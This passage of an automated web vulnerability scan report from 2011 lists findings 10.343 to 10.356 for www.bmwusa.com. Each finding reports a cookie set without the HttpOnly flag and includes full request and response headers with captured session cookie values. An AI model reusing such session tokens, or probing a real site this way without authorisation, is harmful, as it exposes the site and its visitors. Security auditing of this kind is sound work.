Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:14 GMT;path=/
Content-Length: 229186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.343. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:34 GMT;path=/
Content-Length: 215354


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.344. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:33 GMT;path=/
Content-Length: 215355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.345. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:30 GMT;path=/
Content-Length: 202064


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.346. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:53:18 GMT;path=/
Content-Length: 212078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.347. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:38 GMT;path=/
Content-Length: 212079


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.348. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:32:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:52:23 GMT;path=/
Content-Length: 229552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.349. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:40 GMT;path=/
Content-Length: 229553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.350. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:51 GMT;path=/
Content-Length: 215531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.351. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:44 GMT;path=/
Content-Length: 215532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.352. http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/allnew7series.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/allnew7series.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:05:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:25:58 GMT;path=/
Content-Length: 179251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.353. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:59 GMT;path=/
Content-Length: 222823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.354. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:18 GMT;path=/
Content-Length: 222824


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.355. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:42 GMT;path=/
Content-Length: 256070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.356. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/alpinab7/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
